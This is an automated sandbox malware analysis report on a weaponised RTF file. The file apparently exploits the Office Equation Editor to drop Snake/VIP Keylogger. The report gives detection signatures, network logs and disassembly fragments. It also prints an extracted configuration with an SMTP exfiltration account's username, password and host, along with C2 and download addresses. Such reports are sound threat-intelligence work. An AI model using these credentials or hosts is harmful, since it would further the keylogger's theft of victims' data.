Windows Analysis Report
na.doc

Overview

General Information

Sample name: na.doc
Analysis ID: 1545181
MD5: 17fbc6bf368de449e0afb59ff45af1fd
SHA1: f4522ebabac9835ecdad5137fa00b185ecbef04c
SHA256: 8c53c38be598e4c508023f712a8b0d84b13ddfd65cbe17ef33a8200d26881f7a
Tags: docuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: na.doc Avira: detected
Found malware configuration
Source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "whesilolog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "whesilolog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}
Multi AV Scanner detection for submitted file
Source: na.doc ReversingLabs: Detection: 34%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\pKL9HXcZosWfPt1[1].exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org

Exploits
barindex
Office equation editor establishes network connection
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 87.120.84.38 Port: 80 Jump to behavior
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Jump to behavior
Office Equation Editor has been started
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49181 version: TLS 1.2

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 7_2_002B69B8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 002B9743h 7_2_002B9330
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 002B767Dh 7_2_002B7490
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 002B8007h 7_2_002B7490
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 002B9181h 7_2_002B8EC2
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 002BEB89h 7_2_002BE8A8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 7_2_002B71C9
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 002BF4B9h 7_2_002BF1D9
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 002BFDE9h 7_2_002BFB08
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 002BF021h 7_2_002BED40
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 002B9743h 7_2_002B9672
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 002BF951h 7_2_002BF670
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 7_2_002B6FEA
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005685AAh 7_2_005682B0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00564321h 7_2_00564050
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056E54Ah 7_2_0056E250
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00560311h 7_2_00560040
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00567111h 7_2_00566E40
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00568F3Ah 7_2_00568C40
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00566349h 7_2_00566078
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00562339h 7_2_00562068
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056CD62h 7_2_0056CA68
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056BF0Ah 7_2_0056BC10
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005650E9h 7_2_00564E18
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005610D9h 7_2_00560E08
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00567F7Ah 7_2_00567C08
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00563101h 7_2_00562E30
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056FD32h 7_2_0056FA38
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056A722h 7_2_0056A428
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005607A9h 7_2_005604D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005675A9h 7_2_005672D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056C3D2h 7_2_0056C0D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056DBBAh 7_2_0056D8C0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00563599h 7_2_005632C8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056ABEAh 7_2_0056A8F0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005647B9h 7_2_005644E8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00569D92h 7_2_00569A98
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056B57Ah 7_2_0056B280
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00565581h 7_2_005652B0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00561571h 7_2_005612A0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056F3A2h 7_2_0056F0A8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00565A19h 7_2_00565748
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056BA42h 7_2_0056B748
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00560C41h 7_2_00560970
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00567A41h 7_2_00567770
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056F86Ah 7_2_0056F570
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00568A72h 7_2_00568778
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00563A09h 7_2_00563760
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056A25Ah 7_2_00569F60
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005667E2h 7_2_00566510
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056EA12h 7_2_0056E718
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005627D1h 7_2_00562500
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00569402h 7_2_00569108
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056D22Ah 7_2_0056CF30
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00561A09h 7_2_00561738
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00561EA1h 7_2_00561BD0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005698CAh 7_2_005695D0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056D6F2h 7_2_0056D3F8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00565EB1h 7_2_00565BE0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056EEDAh 7_2_0056EBE0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00562C69h 7_2_00562998
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00564C51h 7_2_00564980
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056E082h 7_2_0056DD88
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00563E89h 7_2_00563BB8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056B0B2h 7_2_0056ADB8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056C89Ah 7_2_0056C5A0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00566C79h 7_2_005669A8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0058033Ah 7_2_00580040
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0058330Ah 7_2_00583010
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00581B22h 7_2_00581828
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005837D2h 7_2_005834D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00581FEAh 7_2_00581CF0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00581192h 7_2_00580E98
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0058297Ah 7_2_00582680
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00582E42h 7_2_00582B48
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0058165Ah 7_2_00581360
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00580802h 7_2_00580508
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00580CCAh 7_2_005809D0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005824B3h 7_2_005821B8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00583C9Ah 7_2_005839A0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062AD11h 7_2_0062AA68
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062BA19h 7_2_0062B770
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00623319h 7_2_00623070
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00624021h 7_2_00623D78
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062C721h 7_2_0062C478
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062EC49h 7_2_0062E978
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062FA11h 7_2_0062F740
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00626FE9h 7_2_00626D40
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00627CF1h 7_2_00627A48
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 006289F9h 7_2_00628750
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00629701h 7_2_00629458
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062C2C9h 7_2_0062C020
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00623BC9h 7_2_00623920
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062CFD1h 7_2_0062CD28
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 006248D1h 7_2_00624628
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 006255D9h 7_2_00625330
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062DCD9h 7_2_0062DA30
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 006262E1h 7_2_00626038
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 006292A9h 7_2_00629000
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062F0E1h 7_2_0062EE10
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062B5C1h 7_2_0062B318
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00625E89h 7_2_00625BE0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062E7B1h 7_2_0062E4E0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00626B91h 7_2_006268E8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00627899h 7_2_006275F0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 006285A1h 7_2_006282F8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062B169h 7_2_0062AEC0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00623771h 7_2_006234C8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062BE71h 7_2_0062BBC8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062CB7Bh 7_2_0062C8D0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00624479h 7_2_006241D0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00625181h 7_2_00624ED8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062D881h 7_2_0062D5D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00628149h 7_2_00627EA0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062F579h 7_2_0062F2A8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00628E51h 7_2_00628BA8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00629B59h 7_2_006298B0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062D429h 7_2_0062D180
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00624D29h 7_2_00624A80
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00625A31h 7_2_00625788
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062E1C5h 7_2_0062DE88
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00626739h 7_2_00626490
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00627441h 7_2_00627198
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 7_2_00695F28
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 7_2_00695F38
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 7_2_00692B00
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 7_2_00692E16
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 7_2_00692AF2
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: checkip.dyndns.org
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: api.telegram.org
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 149.154.167.220:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 193.122.6.168:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 193.122.6.168:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 193.122.6.168:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 193.122.6.168:80
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 158.101.44.242:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 193.122.6.168:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 132.226.247.73:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 193.122.130.0:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 193.122.6.168:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 132.226.8.169:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
